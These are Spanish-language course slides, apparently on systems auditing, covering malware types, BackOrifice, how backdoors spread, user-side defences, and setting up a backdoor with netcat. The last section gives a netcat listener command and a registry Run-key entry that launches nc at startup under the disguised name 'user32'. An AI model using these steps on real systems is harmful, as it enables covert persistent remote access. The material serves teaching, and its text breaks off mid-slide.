Documentos de Académico
Documentos de Profesional
Documentos de Cultura
AUDITORIA DE SISTEMAS
SOFTWARE MALINTENCIONADO
Tipos de malware
ampliación
Spyware
definición clásica
Backdoors
Virus
Keyloggers
Gusanos
evolución Dialers
Troyanos
RootKits
Bombas lógicas
Exploits
…
TIPOS DE MALWARE: BACKDOOR
Ejemplo
Backdoor BackOrifice
módulo cliente (atacante) y módulo servidor (víctima)
servidor .exe por defecto abre puerto TCP/31337
atacante obtiene control total sobre la víctima
lectura/escritura de archivos, ejecutar aplicaciones,
reiniciar el sistema, visualizar la pantalla, manejar el ratón
y teclado de la víctima, robar contraseñas, etc.
LOS MAS CONOCIDOS
CONCEPTOS
CONCEPTOS
Formas de Propagación
Ejecutar aplicaciones
Abrir archivos adjuntos
Ingenieria Social
Configuración débil del sistema operativo
Configuración débil de aplicaciones Internet
Vulnerabilidades del S.O. y aplicaciones
BACKDOORS
Troyanos
Telnet
Otras Formas
Redes Compartidas
El sabotaje interno.
CAPACIDADES DE LOS BACKDOORS
Factor humano
Educar / formar al usuario. Cultura de seguridad.
Formatos potencialmente peligrosos
No abrir archivos no solicitados
No utilizar fuentes no confiables
Navegación segura
Política de passwords
Copias de seguridad
BACKDOOR CON NETCAT
LISTADO DE COMANDOS
-d modo oculto o demonio (queda ejecutándose sin interactuar con el equipo)
-e prog ejecuta programa indicado a continuación del parámetro (usado para shells
remotas)
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h Ayuda
-i secs tiempo de espera para líneas enviadas o entre puertos escaneados
-l escucha de conexiones entrantes (tras sesión TCP/UDP deja de escuchar)
-L como -l pero permanece escuchando tras sesión TCP/UDP
-n no realiza resoluciones DNS (realizadas por defecto)
-o file hex dump of traffic
-p port número de puerto
-r randomize local and remote ports
-s addr local source address
-t responde negociaciones TELNET
-u modo UDP (por defecto es TCP)
-v modo detallado(-v -v es aun más detallado)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning>
BACKDOOR CON NETCAT: CONEXION DIRECTA
Este comando le dice al nc que abra el puerto 1234 y nos espere con una
consola (cmd.exe)
nc -vv -l -L -p 8080
Reg add
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/v
user32 /d C:\windows\system32\nc "parametros“
Parametros: